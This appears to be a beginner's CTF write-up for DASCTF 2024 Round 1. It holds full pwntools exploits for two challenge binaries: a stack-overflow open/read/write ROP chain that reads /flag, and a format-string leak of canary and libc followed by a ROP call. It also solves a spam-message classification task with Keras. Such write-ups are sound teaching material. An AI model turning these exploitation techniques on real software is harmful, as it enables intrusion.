DASCTF 2024 Round 1 Partial Writeup

Preface

I'm new to CTF and have spent odd bits of free time over the past two months learning the basics. Many of the challenges were beyond me, but the pwn set was relatively beginner-friendly, so here are my approaches to the few challenges I solved. If anything here is factually wrong, or you have suggestions, corrections from experienced players are very welcome and would help me grow a lot. Thanks!

PWN

Control

checksec control
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

First, look at main.

We find that **gift** reads only 0x10 bytes.

Then, in vuln, there is a stack overflow.

First overwrite the buffer all the way to the return slot and redirect execution to the gift location. Take care to restore the pointer used by _Unwind_RaiseException so the exception is still caught correctly, and then ROP. Since fds 0, 1, and 2 are already open, the descriptor returned by open in the chain below is 3.
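As an aside, the pop gadgets used below can be located with pwntools' ROP helper instead of being hunted down by hand. A minimal sketch; the exact gadget patterns available depend on the build:

from pwn import *

elf = context.binary = ELF('./control')
rop = ROP(elf)
# find_gadget returns the first matching gadget; .address is its virtual address
pop_rdi = rop.find_gadget(['pop rdi', 'ret']).address
pop_rsi = rop.find_gadget(['pop rsi', 'ret']).address
pop_rdx = rop.find_gadget(['pop rdx', 'ret']).address
print(hex(pop_rdi), hex(pop_rsi), hex(pop_rdx))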

p.send(flat(
    b'f'*0x20,
    b'/flag\x00\x00\x00',
    pop_rdi, flag_addr,
    pop_rsi, 0,
    pop_rdx, 0,
    open, # open("/flag", O_RDONLY) -> fd 3
    pop_rdi, 3,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    read, # read(3, bss_addr, 0x100)
    pop_rdi, 1,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    write # write(1, bss_addr, 0x100)
))

The full exploit:

from pwn import *
# p = remote("node5.buuoj.cn",25728)
p = process("./control")
context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']

# Hardcoded addresses from the static, no-PIE binary
bss_addr = 0x4D4400
bss_addr2 = 0x4D3100

gift_addr = 0x4D3350
magic_addr = 0x402183

sys_read = 0x4621A7

obj_point = 0x4D3320
# Gift (0x10 bytes): restore the pointer needed by _Unwind_RaiseException
# and plant the magic gadget
p.sendlineafter("Gift> ",flat(0x4d33a0,magic_addr))
# Overflow up to the return slot and redirect to the gift area
payload = b'a'*0x70 + p64(gift_addr)
p.sendlineafter("How much do you know about control?", payload)

flag_addr = gift_addr

# open/read/write in the static binary, plus pop gadgets
read = 0x462170
write = 0x462210
open = 0x462040
pop_rdi = 0x0000000000401c72
pop_rsi = 0x0000000000405285
pop_rdx = 0x0000000000401aff

# pause()

# ORW chain: open("/flag") -> read into .bss -> write to stdout
p.send(flat(
    b'f'*0x20,
    b'/flag\x00\x00\x00',
    pop_rdi, flag_addr,
    pop_rsi, 0,
    pop_rdx, 0,
    open, # open("/flag", O_RDONLY) -> fd 3
    pop_rdi, 3,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    read, # read(3, bss_addr, 0x100)
    pop_rdi, 1,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    write # write(1, bss_addr, 0x100)
))
# gdb.attach(p)
p.interactive()

Exception

checksec exception
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

All protections are enabled, but there is a format-string vulnerability.

Construct a payload to leak everything we need:

printf_payload =  b'%p-%p-%p-%p-%p-%p-%p-%19$p-'
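
Position 19 holds a recognizable stack pointer and position 7 the canary; locally, the layout can be found by dumping a run of positional arguments. A quick sketch against the local binary:

from pwn import *

# Dump the first 24 positional args; the canary is the high-entropy value
# ending in 00, and ELF/libc/stack pointers are recognizable by their ranges.
context.log_level = 'error'
p = process('./exception')
probe = '-'.join(f'%{i}$p' for i in range(1, 25)).encode()
p.sendafter(b'please tell me your name\n', probe)
for i, v in enumerate(p.recvline().decode().split('-'), start=1):
    print(i, v)
p.close()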

Then, as before, take care to restore the pointer used by _Unwind_RaiseException; and since there is a canary, we should also control rbp to restore the canary.

Finally, ROP:

from pwn import *
from LibcSearcher import *
# p = process('./exception')
p = remote("node5.buuoj.cn",28637)
context.terminal = ['tmux','splitw','-h']
# elf = ELF('./easyFMT')
context.arch = 'amd64'
context.log_level = 'debug'
printf_payload =  b'%p-%p-%p-%p-%p-%p-%p-%19$p-'
p.sendafter("please tell me your name\n",printf_payload)
leak = p.recvline().decode('utf-8').split("-")

print(leak)

# Recover bases by subtracting runtime offsets observed in local debugging
elf_base = int(leak[0], 16) - (0x6433b8b6d060 - 0x6433b8b6c000) - 0x3000
libc_base = int(leak[2], 16) - (0x7f5a392ae1f2 - 0x7f5a391a0000)
ld_base = int(leak[4], 16) - (0x7f86e8789d60 - 0x7f86e8778000)
canary = int(leak[6], 16)
stack_leak = int(leak[7], 16)

what_addr = elf_base + 0x613e02e46408 - 0x613e02e45000  # target in the binary (locally measured offset)

pop_rdi = elf_base + 0x00000000000014e3
pop_rsi_r15 = elf_base + 0x00000000000014e1

payload = flat(
    b'a' * 0x70,
    stack_leak - 0x2918 + 0x18,  # fake rbp so the canary check still passes
    what_addr,
    # padding
    b'a'*0x28,
    pop_rdi,
    libc_base + 0x00000000001b45bd,  # argument pointer in libc (locally measured offset)
    pop_rsi_r15, 
    0,
    0,
    libc_base + 0x7378c9f70290 - 0x7378c9f1e000,  # call target in libc (locally measured offset)
)
p.sendlineafter("How much do you know about exception?",payload)

p.interactive()
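
Incidentally, the LibcSearcher import above goes unused. Instead of hardcoding locally measured offsets, the remote libc could in principle be fingerprinted from the leak; a sketch, where the symbol name is only a placeholder for whatever the leaked pointer actually corresponds to:

from LibcSearcher import LibcSearcher

leaked = int(leak[2], 16)                         # libc pointer from the %p leak above
libc = LibcSearcher('__libc_start_main', leaked)  # placeholder symbol name
libc_base = leaked - libc.dump('__libc_start_main')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')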

MISC

BadMes

From the dataset we find there are only messages, no labels, so first use a Transformer plus K-means to cluster the messages and assign pseudo-labels:

import tensorflow as tf
from tensorflow.keras.layers import TextVectorization, Embedding, MultiHeadAttention, Dense, LayerNormalization, Dropout, GlobalAveragePooling1D, Input
from tensorflow.keras.models import Model
import pandas as pd
from sklearn.cluster import KMeans
import numpy as np

# Open the file and ignore decoding errors
with open('data_2.csv', 'r', encoding='gb2312', errors='ignore') as file:
    data = pd.read_csv(file)
texts = data['message'].astype(str).tolist()

# Preprocessing: text vectorization
max_tokens = 20000
max_len = 256
text_vectorization = TextVectorization(max_tokens=max_tokens, output_sequence_length=max_len)
text_vectorization.adapt(texts)

# Transformer Block Layer
class TransformerBlock(tf.keras.layers.Layer):
    def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):
        super(TransformerBlock, self).__init__()
        self.att = MultiHeadAttention(num_heads=num_heads, key_dim=embed_dim)
        self.ffn = tf.keras.Sequential(
            [Dense(ff_dim, activation="relu"), Dense(embed_dim)]
        )
        self.layernorm1 = LayerNormalization(epsilon=1e-6)
        self.layernorm2 = LayerNormalization(epsilon=1e-6)
        self.dropout1 = Dropout(rate)
        self.dropout2 = Dropout(rate)

    def call(self, inputs, training=False):
        attn_output = self.att(inputs, inputs)
        attn_output = self.dropout1(attn_output, training=training)
        out1 = self.layernorm1(inputs + attn_output)
        ffn_output = self.ffn(out1)
        ffn_output = self.dropout2(ffn_output, training=training)
        return self.layernorm2(out1 + ffn_output)

# Build the model
embed_dim = 32  # Embedding size for each token
num_heads = 2  # Number of attention heads
ff_dim = 32  # Hidden layer size in feed forward network inside transformer

inputs = Input(shape=(), dtype=tf.string)  # each input is a single string
x = text_vectorization(inputs)
x = Embedding(max_tokens, embed_dim)(x)
x = TransformerBlock(embed_dim, num_heads, ff_dim)(x)
x = GlobalAveragePooling1D()(x)

model = Model(inputs=inputs, outputs=x)

# Compute (untrained) embeddings for the texts; raw strings are passed directly
x_embeddings = model.predict(texts)

# Apply K-means clustering
kmeans = KMeans(n_clusters=2, random_state=42)
kmeans.fit(x_embeddings)
cluster_labels = kmeans.labels_  # cluster assignment per message

# Attach the cluster labels to the original data
data['cluster'] = cluster_labels
data.to_csv('saved.csv')
print(data.head())
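
Before fixing labels by hand, it helps to eyeball what the two clusters actually contain; a small sketch reading the saved.csv produced above:

import pandas as pd

df = pd.read_csv('saved.csv')
for c in range(2):
    print(f'--- cluster {c} ---')
    print(df[df['cluster'] == c]['message'].head().to_string())
print(df['cluster'].value_counts())  # cluster balance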

After manually correcting some of the labels, train a Transformer classifier. A sample of the labeled data:

message,cluster
到达目的地后全车x个人开始腹泻,0
是浙江建德市低压电器产业生态的真实变迁,0
胡萝卜素增加3倍、维生素Bl2增加4倍、维生素C增加4,0
高管都需要KPI就没资格做高管,0
护士一检查惊呼怎么牙都蛀成这样了,0
x.x-x.x来张家边苏宁!抢美的空调! 预存xx元:最低=xxx元,最高=xxxx元!预约电话:李店长:xxxxxxxxxxx,1
火箭休赛期总结:可冲击西部冠军惧怕三劲敌,0
中国陆军总兵力有步兵182个师、另加46个独立旅,0
可是黑龙江的贪官腐败分子怎么就揪不出来呀,0
喜欢?卫星15052350470,0
除非因疾病的非正常原因或到法定退休年龄退出,0
发个QQ消息让所有同学回学校办理,0
【hongkee旗舰店】#女人节大促温暖登场#全场x.x折起,新款x.x折仍可用优惠券,x.x当日更有iphonexplus等大奖等亲来拿!,1
破获盗窃电线、电动机等案件10起,0

The training script (it reads a tab-separated file, 80w.txt, with index, label, and message columns):

import pandas as pd
import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import TextVectorization, Embedding, MultiHeadAttention, Dense, LayerNormalization, Dropout, GlobalAveragePooling1D, Input
from tensorflow.keras.models import Model
from sklearn.model_selection import train_test_split

def data_generator(filename, batch_size):
    while True:
        texts, labels = [], []
        with open(filename, 'r', encoding='utf-8') as file:
            next(file)  # skip the header line (if present)
            for line in file:
                if len(texts) == batch_size:
                    yield (np.array(texts), np.array(labels))
                    texts, labels = [], []  # reset for the next batch
                index, label, message = line.strip().split('\t')
                texts.append(message)
                labels.append(int(label))
            if texts:
                yield (np.array(texts), np.array(labels))  # yield the final partial batch

# Define TextVectorization outside the model and adapt it on a sample dataset
# NOTE: adapting on one placeholder string keeps the vocabulary tiny; ideally
# adapt on the real training corpus instead
sample_texts = ['Sample text data for vectorization.']  # Example text
text_vectorization = TextVectorization(max_tokens=10000, output_sequence_length=128)
text_vectorization.adapt(sample_texts)

# Transformer Block Layer
class TransformerBlock(tf.keras.layers.Layer):
    def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):
        super(TransformerBlock, self).__init__()
        self.att = MultiHeadAttention(num_heads=num_heads, key_dim=embed_dim)
        self.ffn = tf.keras.Sequential([
            Dense(ff_dim, activation="relu"), 
            Dense(embed_dim)
        ])
        self.layernorm1 = LayerNormalization(epsilon=1e-6)
        self.layernorm2 = LayerNormalization(epsilon=1e-6)
        self.dropout1 = Dropout(rate)
        self.dropout2 = Dropout(rate)

    def call(self, inputs, training=False):
        attn_output = self.att(inputs, inputs)
        attn_output = self.dropout1(attn_output, training=training)
        out1 = self.layernorm1(inputs + attn_output)
        ffn_output = self.ffn(out1)
        ffn_output = self.dropout2(ffn_output, training=training)
        return self.layernorm2(out1 + ffn_output)

# Model building
embed_dim = 32
num_heads = 2
ff_dim = 32
inputs = Input(shape=(), dtype=tf.string)  # each input is expected to be a single string
x = text_vectorization(inputs)  # apply text vectorization to the input

x = Embedding(10000, embed_dim)(x)
x = TransformerBlock(embed_dim, num_heads, ff_dim)(x)
x = GlobalAveragePooling1D()(x)
outputs = Dense(1, activation='sigmoid')(x)
model = Model(inputs=inputs, outputs=outputs)

model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])

# Training model using generator
train_gen = data_generator('80w.txt', batch_size=32)
valid_gen = data_generator('80w.txt', batch_size=32)  # Ideally, use a separate validation file or method

model.fit(train_gen, steps_per_epoch=100, epochs=200, validation_data=valid_gen, validation_steps=10)

# # Test-data generator
# test_gen = data_generator('test_data.txt', 32)  # assumes a separate test file

# # Evaluate the model with the generator
# test_loss, test_acc = model.evaluate(test_gen, steps=10)  # make sure enough steps are provided
# print(f"Test Accuracy: {test_acc}")

# Save model
model.save("transformer_binary_classification_model")
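
Before pointing anything at the remote service, the saved model can be sanity-checked locally. A quick sketch using two messages from the labeled sample above (the ad should score near 1, the normal message near 0):

import tensorflow as tf
import numpy as np

model = tf.keras.models.load_model("transformer_binary_classification_model")
samples = np.array(['x.x-x.x来张家边苏宁!抢美的空调!', '发个QQ消息让所有同学回学校办理'])
print(model.predict(samples))  # probabilities; the client below treats >0.55 as spam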

Then write a socket client script and let it answer in a loop:

import socket
import tensorflow as tf
import numpy as np

# Load the whole model (assuming TextVectorization was saved along with it)
model = tf.keras.models.load_model("transformer_binary_classification_model")

# Connect to the nc server
host = '4.216.46.225'  # server IP
port = 2333  # server port

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    print("Connected to nc server.")

    try:
        while True:
            # Receive a message from the nc server
            received_data = s.recv(1024).decode("utf-8")
            if not received_data:
                print("No more data from server. Exiting.")
                break
            print("Received message from nc server:", received_data)

            # Classify the received message
            processed_data = np.array([received_data])  # wrap the message in a NumPy array
            prediction = model.predict(processed_data)[0][0]  # predicted probability
            result = 1 if prediction > 0.55 else 0  # threshold to a 0/1 label

            # Send the classification result back to the nc server
            s.sendall(str(result).encode("utf-8"))
            print("Classification result sent to nc server.")
    except KeyboardInterrupt:
        print("Disconnected from server.")
    except Exception as e:
        print(f"An error occurred: {e}")

With 300 training epochs, accuracy reaches 95.8%; in the best run this answered 261/300 correctly.
